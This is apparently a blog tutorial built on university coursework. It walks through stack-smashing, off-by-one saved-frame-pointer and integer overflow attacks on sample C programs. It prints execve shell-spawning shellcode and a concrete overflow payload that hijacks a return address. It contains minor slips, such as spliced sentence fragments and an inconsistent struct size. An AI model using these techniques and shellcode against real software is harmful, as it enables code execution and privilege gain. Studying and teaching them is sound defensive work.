Buffer Overflow Vulnerability & Exploits

0. Getting started

Here is some discussion about the buffer overflow. This article is the first part and it will discuss basic smashing the stack and integer overflow vulnerabilities followed by sploit examples.

The second part will discuss format string vulnerability and exploits in details, you can find it here.

Before getting started, I’d like to recommend two papers that I found helpful:

  1. Smashing The Stack For Fun And Profit by Aleph One 
  2. Exploiting Format String Vulnerabilities by scut/team teso

Also, there might have mistakes in the following discussion; you can either report as comments or email me directly. Thank you.


1. Intro to buffer overflow

a. What is buffer overflow?

The basic idea of buffer overflow: we may edit/overwrite some data after the buffer.

Here is the setting: on the stack, we have a buffer of fixed size (Typically, this buffer is designed to store user input data.) Consider the case:

// typical programming error of string copy without boundary checking
// input: user input
void foo(char *input)
{
  char buf[4]
  strcpy(buf, input)
  ...
}

In the above case, we have a buffer of 4 bytes on the stack and waiting to store user inputs. What if the input size is greater than 4 bytes? Since strcpy function doesn’t have boundary checking, we can overwrite some data on the stack. Assuming our input string is “\x55\x55\x55\x55\x55”, which is 5 bytes, and the buf is allocated at 0xbfffff00. Below is the virtual representation of the stack:

[    buf    ][memory on stack]
[bfffff--   ][bfffff--       ]
[00|01|02|03][04|...         ]
[55|55|55|55][55|...         ]

The buffer is 4 bytes, but we will write 5 bytes into the stack; one more byte at 0xbffff04 has been modified here.

b. How to make use of this vulnerability?

But what are the consequences if the memory in the stack can be modified? We can crash the program easily by filling the stack with meaningless bytes. But sometimes, as attackers, we may also want to change the functionality of the program.

Essentially, we’d like to insert a piece of code (it’s called shellcode) that do things we want into the stack and manage to run it. The question here is how do we change the workflow so that the program execute the code we inserted. Here, some basic knowledge of the memory/stack layout may be helpful to understand how do we achieve this goal.

Below is a common memory layout of C program, we have stack growing downward and heap growing upward.

lower memory                                        higher memory
[--text--][--data--][heap-------->][<--------stack][--argv/env--]

Consider the following code:

void foo(char *input)
{
  char buf[4]
  strcpy(buf, input)
  ...
}
int main(int argc, char *argv[])
{
  ...
  foo(argv[1]);
  ...
}

We have stack layout

Stack layout:
lower memory                         higher memory
[<------------------------------------------stack]
[--------foo--------][-ebp-][-eip-][-params-][...]
[.........|---buf---]

Notice that after the foo frame, we have saved %ebp and %eip register, where %ebp is the saved base pointer, and %eip is the saved instruction pointer. The one we are interested in is %eip register since it contains the instruction pointer that will be executed next after foo function finished, and if we can edit it, we may decide which insruction the program will run next. Therefore, we can redirect the workflow of the program to run our shellcode.

c. How to design the attack?

With the current settings, we have two goals: 1. writing the shellcode that we want to execute; 2. modify the %eip register located on the stack to let it points to the beginning of our shellcode.

Here, I won’t go into too many details of how to write the shellcode. Some basic ideas of shellcode are: 1. it should be short enough to fit into the buffer; 2. to hide our activity, the program should exit normally instead of reporting errors; 3. One common goal is to gain the root permission (some preconditions are needed). This can be achieved by execve() system call. Below is the shellcode we are going to use. If you are interested in the details, read the article written by Alpha one.

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b
 \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd
 \x80\xe8\xdc\xff\xff\xff/bin/sh"

Looks great. The question now becomes how do we modify the %eip register to let it points to the beginning of our shellcode so that when the function returns, our shellcode can be executed.

Since we are dealing with a program that is written by others, it’s hard to figure out exactly where the buffer is allocated in the memory space. Intuitively, it is easier to guess an address in 32-bit architecture than in 64-bit. Here, for simplicity, assuming we are dealing with 32-bit architecture with ASLR (address space layout randomization) turned off.

One technique we can use here is adding NOP sleds(0x90 in machine code) before our shellcode. Since NOP sleds do nothing, instead of redirect to the exact beginning location of the shellcode, we can now redirect to anywhere in the NOPs, so that the chance of guessing correctly is higher.

In conclusion, our sploit code is composite by these three elements: NOPs, shellcode, and an return address.


2. Smashing the stack

Look at thNow, we should have a basic understanding of what is the buffer overflow and how does an exploit look like. Let’s look at a simple example below:

int check_fail(char *name)
{
  char buf[20];
  strcpy(buf, name);
  /* 
   * Assume theres some useful
   * function here to check if 
   * a student has failed.
   */
  return 1;
}

int main(int argc, char *argv[])
{
  char grade;

  if(argc != 2) {
      fprintf(stderr, "target0: argc != 2\n");
      exit(EXIT_FAILURE);
  }
  
  if(check_fail(argv[1]))
    grade = 'F';
  else
    grade = 'A';

  fprintf(stdout, "Grade = %c\n", grade);

  return 0;
}

Since this target uses strcpy, which copies a string without boundary checking, we can use the technique mentioned above to perform the smash-the-stack attack.

Instead of gaining the root permission, our goal is simple here: we want to change the grade from F to A. How to achieve this goal?

Remember that through the buffer overflow, we can freely change any data in the stack that has a higher memory address than the buffer. As mentioned before, we want to change the return address. Here, after function check_fail(), the program will continue at line 22 (the if statement), so that our grade will be assigned to F. But if we can skip the if statement, and modify the return address to line 25, our grade will be assigned to A.

Since we assume that ASLR is off, the check_fail function will start with the same address every time. Let’s try to input an empty string to find the memory layout:

By using gdb, we break at function check_fail(). We can see that the values in %esp and %ebp are 0xbffffe40 and 0xbffffe68. Recall %esp is the stack pointer (stores the address of the top of the stack), and %ebp is the base pointer (stores the address of the bottom of the stack). We have:

top of stack                                           bottom of stack
lower memory                                             higher memory
[<--------------------------------------------------------------stack]
[----------------0xbffffe---------------]
[4|4|4|4|...                  ...6|6|6|6]      
[0|1|2|3|...                  ...5|6|7|8]
[------check_fail() function frame------][-ebp-][-eip-][-params-][...]

Since we know the check_fail() function frame ends at 0xbffffe60 and %ebp & %eip is next to it, we can compute the address of %eip: 0xbffffe68 + 4 bytes (skip %ebp) = 0xbfffe6c is the address of %eip. We can check, in the gdb, if our calculation is correct.

Looks great! Since 0x08048513 is the next instruction, we find the correct address of %eip. And it starts 4 bytes after check_fail() function frame. Now we can try to figure what should our input so that we can change the value of %eip.

Apply what we discussed before to this case, the buffer size is 20 byte and we want to overwrite the %eip that starts 4 bytes after the buffer, so we’d like to have a input string of 28 bytes and the last 4 bytes should be 0x0804851d (this is the address of assemble code that assign grade to A, check the image above). The last thing we should be careful is we don’t want the program to crash, so we should keep the value of saved %ebp unchanged. Therefore, our final input should be (little endian):

[NOPs(20 bytes)][ebp(4 bytes)][eip(4 bytes)] 
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\xc5\xff\xff\xbf\x1d\x85\x04\x08

Great! Let’s look at another example that is a little more complicated:

int bar(char *arg, char *out)
{
  strcpy(out, arg);
  return 0;
}

int foo(char *argv[])
{
  char buf[160];
  bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target1: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv);
  return 0;
}

Our goal here, except changing the value of saved eip on the stack, we also want to gain the root authority, so the shellcode mentioned before is needed in this case.

We have the same idea here, our input strinWe have the same idea here; our input string should be composited in the form “<NOPs><shellcode><modified eip>”, and it length should be 168. Notice here since the shellcode helps us to exit normally, we don’t need to include %ebp here.

Usually, we need to guess the address of the buffer in the memory, so we have NOP sleds here is to increase the chance of guessing correctly. But since ALSR is off, by using gdb, we can figure out the exact address, and the NOPs in the input can be treated as space holders.

By applying the same procedure, it’s not hard to find out what should our input string be. Maybe try this by yourself. The answer can be found in my github repository; you can follow the link at the end.


Now, having the idea of exploiting, we are ready to see a few examples that might be challenging.

void nstrcpy(char *out, int outl, char *in)
{
  int i, len;

  len = strlen(in);
  if (len > outl)
    len = outl;

  for (i = 0; i <= len; i++)
    out[i] = in[i];
}

void bar(char *arg)
{
  char buf[160];

  nstrcpy(buf, sizeof buf, arg);
}

void foo(char *argv[])
{
  bar(argv[1]);
}

int main(int argc, char *argv[])
{
  if (argc != 2)
    {
      fprintf(stderr, "target2: argc != 2\n");
      exit(EXIT_FAILURE);
    }
  foo(argv);
  return 0;
}

Think about the above code for a while; do you see where the vulnerability is?

In function bar(), it uses user-defined-function nstrcpy() instead of library-function strncpy(). And there is a programming error in nstrcpy(). Look at line 9; the boundary checking is wrong since it will copy one more bytes than it is supposed to be.

But the question is, how do we make use of this error? It seems like, with one-byte overflow, we cannot modify the save eip value on the stack (since eip starts at 4 bytes after the buffer). But recall what is next to the buffer? Saved %ebp. It turns out that we can modify the least significant byte of it. Think about what byte value we should overwrite here to make our sploit works.

Here, the idea is, we want the saved ebp contains an address located in our buffer. Since ebp is next to our buffer (they are close in address space), and by changing the least significant bit, we have a high chance to achieve that.

Now comes the tricky part, since when the function returns, it will retrieve the saved ebp and eip based on the current ebp. (If this is unfamiliar, you might want to review how the function call works in assembly, here is a good explanation of function call procedure by Prof. Remzi H. Arpaci-Dusseau @ University of Wisonsin-Madison). The virtual representation might also be helpful:

top of stack bottom of stack
lower memory higher memory
[<---------------------------------------------------------stack]
[-------bar() function frame-------][-ebp-][-eip-][-params-][...]
[...<fake ebp><fake eip><shellcode>]                           

We want the saved ebp points to the address of the faked ebp, and faked eip points to our shellcode. So that when the function bar() returns, the current %ebp will point to the beginning address of the faked ebp. Then, when the function foo() returns, it will retrieve faked ebp and faked eip as saved ebp and eip. And since faked eip points to our shellcode, it can be executed.

So our input string will be composited in the form “<fake ebp><fake eip><NOPs><shellcode><least significant bit>” and its size should be 161. Fake eip should point to somewhere between NOPs. With ASLR off, we can calculate the exact address as before.


3. Integer overflow

Now, we’ve finished talking about the basic buffer overflow. Let’s move to the integer overflow. Look at the piece of code below:

size_t len = read_int_from_network();
char *buf;
buf = malloc(len + 5);
read(fd, buf, len);

What if len is a huge number, e.g., 0xFFFFFFFF? Then, we will allocate a buffer with a size of 4 (integer overflow: len + 5 = 4), but read a lot of data in that buffer.

Also, we might use this vulnerability to exploit the program, look at the example below:

struct widget_t {
  int x;
  int y;
  double z;
};

#define MAX_WIDGETS 160

int foo(char *in, int count)
{
  struct widget_t buf[MAX_WIDGETS];

  if (count < MAX_WIDGETS) 
    memcpy(buf, in, count * sizeof(struct widget_t));

  return 0;
}

int main(int argc, char *argv[])
{
  int count;
  char *in;

  if (argc != 2)
    {
      fprintf(stderr, "target3: argc != 2\n");
      exit(EXIT_FAILURE);
    }

  /*
   * format of argv[1] is as follows:
   *
   * - a count, encoded as a decimal number in ASCII
   * - a comma (",")
   * - the remainder of the data, treated as an array
   *   of struct widget_t
   */

  count = (int)strtoul(argv[1], &in, 10);
  if (*in != ',')
    {
      fprintf(stderr, "target3: argument format is [count],[data]\n");
      exit(EXIT_FAILURE);
    }
  in++;                         /* advance one byte, past the comma */
  foo(in, count);

  return 0;
}

Focus the code at line 13-14, count is the user input value, MAX_WIDGETS is 160 here; the program says if count is less than 160, copy count * 8 (size of struct is 8 here) bytes from input to buf.

How do we make use of the Integer Overflow vulnerability here? Since count is a signed integer, with a leading 1 (in binary representation), it will be interpreted as a negative number when comparing with MAX_WIDGETS. After multiplying with 16, the leading 1 overflows, and the result is our input size.

This is a good source to learn more about the integer overflow if you are interested.

Example codes are selected from the coursework of COMPSCI642: Introduction to Information Security taught by Prof. Earlence Fernandes @ the University of Wisconsin-Madison.

Kai